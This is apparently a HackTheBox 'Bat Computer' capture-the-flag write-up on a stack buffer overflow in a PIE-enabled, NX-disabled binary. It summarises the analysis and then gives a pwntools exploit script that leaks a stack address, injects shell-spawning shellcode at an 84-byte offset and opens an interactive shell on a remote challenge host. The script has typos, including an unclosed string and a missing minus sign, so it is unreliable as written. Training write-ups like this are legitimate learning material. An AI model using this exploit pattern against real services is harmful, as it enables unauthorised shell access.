We covered a binary that has only PIE or Position Independent Executable enabled as a protection while NX was disabled. We analyzed the binary with Ghidra and GDB. We discovered that the binary leaks the memory address of the variable used to store the user input. Based on that, we also found that the binary reads up to 137 bytes of user input and stores it in a variable whose buffer size is 76 bytes which is the core vulnerability of this app. We caused segmentation fault based on that and found the offset to be 84 bytes. Based on the analysis above, we built the exploitation script carrying the connection parameter and the final payload. This was part of HackTheBox Bat Computer | Intro to binary exploitation

Buffer Overflow Techniques Notes

Exploit Code is below

##Beginning

from pwn import *

context.binary = ELF(‘./batcomputer’)

con = remote(‘157.245.39.76’,31662)

con.sendline(‘1’)

con.recvuntil(‘0x’)

stack_base = int((“0x”+con.recv().decode(‘latin-1’).split()[0]),16)

log.success(f‘stack base: {hex(stack_base)})

con.sendline(‘2’)

con.sendline(‘b4tp@$$w0rd!’)

payload = asm(shellcraft.popad() + shellcraft.sh()) # shellcode

payload += b‘A’*(84 len(payload)) # nop

payload += p64(stack_base) # stack base

con.sendline(payload)

con.sendline(‘3’)

con.interactive()

##Ending

Video Walkthrough